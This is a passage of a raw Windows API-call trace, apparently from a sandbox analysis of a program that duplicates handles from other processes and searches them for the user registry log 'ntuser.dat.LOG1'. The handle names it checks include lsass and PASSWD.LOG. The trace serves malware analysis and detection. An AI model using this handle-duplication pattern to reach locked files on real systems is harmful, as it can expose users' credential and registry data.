[0151.456] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.457] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.458] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.458] CloseHandle (hObject=0x670) returned 1 [0151.458] CloseHandle (hObject=0x680) returned 1 [0151.458] CloseHandle (hObject=0x62c) returned 1 [0151.458] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1ac) returned 0x62c [0151.458] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.458] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.459] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.460] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.460] CloseHandle (hObject=0x670) returned 1 [0151.460] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0151.460] CloseHandle (hObject=0x680) returned 1 [0151.461] CloseHandle (hObject=0x62c) returned 1 [0151.461] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1ac) returned 0x62c [0151.461] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x154, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.461] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.461] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.462] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.463] CloseHandle (hObject=0x670) returned 1 [0151.463] CloseHandle (hObject=0x680) returned 1 [0151.463] CloseHandle (hObject=0x62c) returned 1 [0151.463] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0151.463] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.463] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.463] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.464] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.464] CloseHandle (hObject=0x670) returned 1 [0151.464] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0151.464] CloseHandle (hObject=0x680) returned 1 [0151.465] CloseHandle (hObject=0x62c) returned 1 [0151.465] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0151.465] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.465] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.465] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.467] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.467] CloseHandle (hObject=0x670) returned 1 [0151.467] _wcsicmp (_Str1="\\ntsvcs", _Str2="\\ntuser.dat.LOG1") returned -2 [0151.467] CloseHandle (hObject=0x680) returned 1 [0151.467] CloseHandle (hObject=0x62c) returned 1 [0151.467] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0151.467] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.467] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.468] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.470] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.471] CloseHandle (hObject=0x670) returned 1 [0151.471] _wcsicmp (_Str1="\\ntsvcs", _Str2="\\ntuser.dat.LOG1") returned -2 [0151.471] CloseHandle (hObject=0x680) returned 1 [0151.471] CloseHandle (hObject=0x62c) returned 1 [0151.471] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0151.471] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.471] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.472] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.473] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.473] CloseHandle (hObject=0x670) returned 1 [0151.473] _wcsicmp (_Str1="\\ntsvcs", _Str2="\\ntuser.dat.LOG1") returned -2 [0151.473] CloseHandle (hObject=0x680) returned 1 [0151.473] CloseHandle (hObject=0x62c) returned 1 [0151.473] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0151.474] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.474] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.474] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.475] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.476] CloseHandle (hObject=0x670) returned 1 [0151.476] CloseHandle (hObject=0x680) returned 1 [0151.476] CloseHandle (hObject=0x62c) returned 1 [0151.476] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0151.476] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x104, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.476] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.476] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.477] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.478] CloseHandle (hObject=0x670) returned 1 [0151.478] _wcsicmp (_Str1="\\scerpc", _Str2="\\ntuser.dat.LOG1") returned 5 [0151.478] CloseHandle (hObject=0x680) returned 1 [0151.478] CloseHandle (hObject=0x62c) returned 1 [0151.478] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0151.478] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x108, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.478] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.479] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.480] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.480] CloseHandle (hObject=0x670) returned 1 [0151.480] _wcsicmp (_Str1="\\scerpc", _Str2="\\ntuser.dat.LOG1") returned 5 [0151.480] CloseHandle (hObject=0x680) returned 1 [0151.480] CloseHandle (hObject=0x62c) returned 1 [0151.480] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0151.480] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.480] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.481] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.482] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.482] CloseHandle (hObject=0x670) returned 1 [0151.482] _wcsicmp (_Str1="\\scerpc", _Str2="\\ntuser.dat.LOG1") returned 5 [0151.482] CloseHandle (hObject=0x680) returned 1 [0151.482] CloseHandle (hObject=0x62c) returned 1 [0151.482] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0151.482] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2d4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.482] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.483] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.484] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.484] CloseHandle (hObject=0x670) returned 1 [0151.484] CloseHandle (hObject=0x680) returned 1 [0151.484] CloseHandle (hObject=0x62c) returned 1 [0151.484] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0151.485] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.485] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.485] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.486] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.486] CloseHandle (hObject=0x670) returned 1 [0151.486] CloseHandle (hObject=0x680) returned 1 [0151.487] CloseHandle (hObject=0x62c) returned 1 [0151.487] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0151.487] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.487] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.487] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.491] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.491] CloseHandle (hObject=0x670) returned 1 [0151.491] _wcsicmp (_Str1="\\CatalogChangeListener-1d8-0", _Str2="\\ntuser.dat.LOG1") returned -11 [0151.491] CloseHandle (hObject=0x680) returned 1 [0151.491] CloseHandle (hObject=0x62c) returned 1 [0151.491] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0151.491] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2e8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.491] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.492] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.493] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.494] CloseHandle (hObject=0x670) returned 1 [0151.494] CloseHandle (hObject=0x680) returned 1 [0151.494] CloseHandle (hObject=0x62c) returned 1 [0151.494] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0151.494] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2ec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.494] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.495] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.496] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.496] CloseHandle (hObject=0x670) returned 1 [0151.496] CloseHandle (hObject=0x680) returned 1 [0151.496] CloseHandle (hObject=0x62c) returned 1 [0151.496] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0151.496] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x33c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.496] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.497] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.506] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.506] CloseHandle (hObject=0x670) returned 1 [0151.506] _wcsicmp (_Str1="\\044a6734-e90e-4f8f-b357-b2dc8ab3b5ec", _Str2="\\ntuser.dat.LOG1") returned -62 [0151.506] CloseHandle (hObject=0x680) returned 1 [0151.506] CloseHandle (hObject=0x62c) returned 1 [0151.506] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0151.506] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.506] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.509] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.510] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.510] CloseHandle (hObject=0x670) returned 1 [0151.510] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0151.510] CloseHandle (hObject=0x680) returned 1 [0151.510] CloseHandle (hObject=0x62c) returned 1 [0151.510] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0151.510] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.510] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.511] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.511] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.511] CloseHandle (hObject=0x670) returned 1 [0151.511] CloseHandle (hObject=0x680) returned 1 [0151.511] CloseHandle (hObject=0x62c) returned 1 [0151.511] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0151.511] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.511] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.512] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.513] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.513] CloseHandle (hObject=0x670) returned 1 [0151.513] CloseHandle (hObject=0x680) returned 1 [0151.513] CloseHandle (hObject=0x62c) returned 1 [0151.513] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0151.513] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.513] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.514] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.514] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.514] CloseHandle (hObject=0x670) returned 1 [0151.514] _wcsicmp (_Str1="\\PASSWD.LOG", _Str2="\\ntuser.dat.LOG1") returned 2 [0151.514] CloseHandle (hObject=0x680) returned 1 [0151.515] CloseHandle (hObject=0x62c) returned 1 [0151.515] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0151.515] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x354, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.515] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.515] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.516] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.516] CloseHandle (hObject=0x670) returned 1 [0151.516] CloseHandle (hObject=0x680) returned 1 [0151.516] CloseHandle (hObject=0x62c) returned 1 [0151.516] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0151.516] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x358, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.516] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.517] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.518] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.518] CloseHandle (hObject=0x670) returned 1 [0151.518] _wcsicmp (_Str1="\\lsass", _Str2="\\ntuser.dat.LOG1") returned -2 [0151.518] CloseHandle (hObject=0x680) returned 1 [0151.518] CloseHandle (hObject=0x62c) returned 1 [0151.518] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0151.518] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x360, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.518] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.518] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.519] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.519] CloseHandle (hObject=0x670) returned 1 [0151.519] _wcsicmp (_Str1="\\lsass", _Str2="\\ntuser.dat.LOG1") returned -2 [0151.519] CloseHandle (hObject=0x680) returned 1 [0151.519] CloseHandle (hObject=0x62c) returned 1 [0151.519] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0151.519] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x390, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.519] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.520] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.521] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.521] CloseHandle (hObject=0x670) returned 1 [0151.521] CloseHandle (hObject=0x680) returned 1 [0151.521] CloseHandle (hObject=0x62c) returned 1 [0151.521] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0151.521] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x3c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.521] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.522] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.523] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.523] CloseHandle (hObject=0x670) returned 1 [0151.523] _wcsicmp (_Str1="\\protected_storage", _Str2="\\ntuser.dat.LOG1") returned 2 [0151.523] CloseHandle (hObject=0x680) returned 1 [0151.523] CloseHandle (hObject=0x62c) returned 1 [0151.523] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0151.523] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x3c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.523] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.524] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.524] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.524] CloseHandle (hObject=0x670) returned 1 [0151.525] _wcsicmp (_Str1="\\protected_storage", _Str2="\\ntuser.dat.LOG1") returned 2 [0151.525] CloseHandle (hObject=0x680) returned 1 [0151.525] CloseHandle (hObject=0x62c) returned 1 [0151.525] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0151.525] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x3c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.525] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.525] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.526] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.526] CloseHandle (hObject=0x670) returned 1 [0151.526] _wcsicmp (_Str1="\\protected_storage", _Str2="\\ntuser.dat.LOG1") returned 2 [0151.526] CloseHandle (hObject=0x680) returned 1 [0151.526] CloseHandle (hObject=0x62c) returned 1 [0151.526] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0151.526] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x550, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.526] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, 